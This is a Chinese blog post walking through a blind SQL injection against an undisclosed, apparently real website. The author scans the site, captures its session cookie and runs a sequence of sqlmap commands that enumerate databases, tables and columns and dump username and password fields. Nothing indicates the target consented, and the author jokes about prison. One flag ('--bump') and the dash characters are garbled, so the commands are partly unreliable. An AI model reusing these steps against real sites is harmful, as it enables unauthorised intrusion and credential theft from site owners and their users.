记一次sql盲注

释放双眼,带上耳机,听听看~!

首先我们使用我们的扫描器对目标网站进行探测

image

OK,对于这种网站,我们就可以实施sql盲注

然后我们打开网站对其进行抓包

image

打开bp对其cookie的抓取

image

下面我们打开我们的kali

俗话说kali学的好,牢房做的久

首先进入终端,先查看我们神器sqlmap的使用方法

image

在这里我们我们可以看见sqlmap的基础用法

如果想知道sqlmap的更多用法输入sqlmap -h即可查看

ok,下面开始对今天的目标进行渗透
···
sqlmap -u “url” –cookie=”PHPSESSID=db9a4ba4cd9b23ea2383c82b261e4add; __tins__18900223=%7B%22sid%22%3A%201586910935483%2C%20%22vd%22%3A%201%2C%20%22expires%22%3A%201586912735483%7D; 51cke=; 51laig=1″ –dbs –batch –tamper=space2comment –random-agent –level 3 –risk 3
···
对于网址我就不方便透露了

–dbs 查询所有数据库

–batch 默认选项

–tamper=space2comment 使用编码

–random-agent 对头进行编码

–level 3和–risk 3 使用三级扫描 (–level 默认有五级)

ok,可以看出我们成功爆出数据库

下面我们对数据库进行查表
···
sqlmap -u “url” –cookie=”PHPSESSID=db9a4ba4cd9b23ea2383c82b261e4add; __tins__18900223=%7B%22sid%22%3A%201586910935483%2C%20%22vd%22%3A%201%2C%20%22expires%22%3A%201586912735483%7D; 51cke=; 51laig=1″ -D 库名 –tables –batch –tamper=space2comment –random-agent –level 3 –risk 3
···
-D 表示你所要查询的数据库

–tables 表示当前数据库所有表

在这我们已经能看出来表已经出来了,下面我们对其字段的查询
···
sqlmap -u “url” –cookie=”PHPSESSID=db9a4ba4cd9b23ea2383c82b261e4add; __tins__18900223=%7B%22sid%22%3A%201586910935483%2C%20%22vd%22%3A%201%2C%20%22expires%22%3A%201586912735483%7D; 51cke=; 51laig=1″ -D 库名 -T –columns –batch –tamper=space2comment –random-agent –level 3 –risk 3
···
-T指定的表名

–columns 查询当前表的字段

image

ok,成功爆出字段,下面我们对这个字段进行用户名及密码的破解
···
sqlmap -u “url” –cookie=”PHPSESSID=db9a4ba4cd9b23ea2383c82b261e4add; __tins__18900223=%7B%22sid%22%3A%201586910935483%2C%20%22vd%22%3A%201%2C%20%22expires%22%3A%201586912735483%7D; 51cke=; 51laig=1″ -D 库名 -T aboutus -C username,password –bump –batch –tamper=space2comment –random-agent –level 3 –risk 3
···
-C 表示查询什么

username,password 查询用户名及密码

–bump 将结果输入

image

ok,出现这种情况表示当前用户名及密码为空,不是表示我们的命令出问题了

原文地址

人已赞赏
代码审计网络安全

ThinkPHP存在SQL注入漏洞(CNVD-2020-25573)

2020-5-31 10:13:17

系统提权网络安全

CVE-2020-0796远程代码执行复现

2020-6-5 23:14:50

0 条回复 A文章作者 M管理员
    暂无讨论,说说你的看法吧
个人中心
购物车
优惠劵
今日签到
有新私信 私信列表
搜索